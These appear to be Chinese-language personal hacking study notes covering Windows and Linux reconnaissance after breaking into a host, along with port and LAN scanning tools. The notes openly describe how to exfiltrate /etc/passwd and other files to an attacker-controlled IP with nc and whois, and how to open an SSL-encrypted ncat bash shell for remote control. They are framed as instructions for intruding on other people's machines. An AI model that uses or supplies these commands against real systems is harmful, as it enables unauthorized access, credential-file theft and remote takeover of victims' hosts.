信息搜集
本地信息搜集
kali环境
whoami 查看自己身份
whoami /all 获取当前域的信息
ipconfig 获取IP地址的信息
ipconfig /all 获取详细的IP地址信息
arp -a 查看arp表
systeminfo 查看操作系统信息
echo %PROCESSOR_ARCHITECTURE% 查看cpu
wmic product 查看安装了什么软件
wmic product get name,version 更加详细一点
当我们入侵到别人的主机时使用这个指令看到这台机器装了python,那么我们可以就考虑用python写一个木马来进行提权操作
上面两个wmic指令可能用时较长 等不及可以ctrl+c一下
net user 查看本地用户
administrator和guest是一定有的,其他不一定,一般我们刚侵入对方,我们的权限就是guest
net session 显示本地和远程的会话
一般都会是空的,当你在使用这台机器而其他人也在控制这台机器的时候,这里就会有两个人
net view 查看内网的共享
net shell 查看自己共享了什么东西
一般刚下载时,如果没有特定设置,都会有这个C$,即C盘共享
如果你也知道对方的密码,输入上面这个指令就可以直接查看对方的C盘而对方是不知道的
-------------------------------------------
远程信息搜集
什么样的服务器是有入侵价值的?
1.上面有价值的网站
seo.chinaz.com 查看seo信息
权重,ip访问量(cpv,cpa,cps)
2.上面有庞大的数据库的服务器
mssql mysql oracle redis.......
3.性能优异的服务器
高性能的cpu,显卡,硬盘
4.保密~
----------------------------------------------
打开kali
nping kali自带
nping --tcp -p 80 --flag syn 2 [目标IP]
测试对方端口是否开放
nc -nvz [目标IP] 1-65535
使用nc查看对方端口是否开放
netdiscover -i eth0 -r 192.168.1.0/24... 内网[ip]
测试内网用户信息
arping [参数][目标]
参数:
-i 指定网卡
-c 发包的数量
-s 源mac
-S 源ip
arping -i eth0 [目标ip]
使用arp扫描
nbtscan 目标IP
使用netbios协议进行信息搜集(只能在windows和windows中使用)
netbios协议就是计算机名------ip对应地址的解析协议
whatweb http://ip
初步分析网络的结构
--------------------------------------------------
Linux加密传输
目标:
cat /etc/passwd | base64 | nc -nv [黑客IP] 3333 -q l
将用户信息通过64位加密通过3333端口传输给黑客
黑客:
nc -l -p 3333 >kali.txt
把拿过来的数据放在kali.txt里
这样就传过来了
解密后就是原来的数据了
----------------------------------------------
文件传输
目标:
nc -nv [黑客IP] 3333 < [要传的文件(路径)] -q l -q l是为了传输后立马断开
黑客:
nc -lp 3333 >xx.txt
----------------------------------------------------
两台都是linux的情况
目标:
whois -h [黑客IP] -p 4444 ·cat /etc/passwd |base64`
黑客:
nc -l -v -p 4444 | sed "s/ //g" | base64 -d
-------------------------------------------------
两台都是linux ,并且要加密通信
目标:
ncat -c bash --allow [黑客IP] -vnl 3333 --ssl 只允许黑客IP去控制他
黑客:
nc -nv [目标IP] 3333 --ssl
============================
任务:
了解多个windows server 如何搭建域环境
runoob上javascript搞定
了解 vmware
kvm
xen
openvz
openstack
docker
virtual oc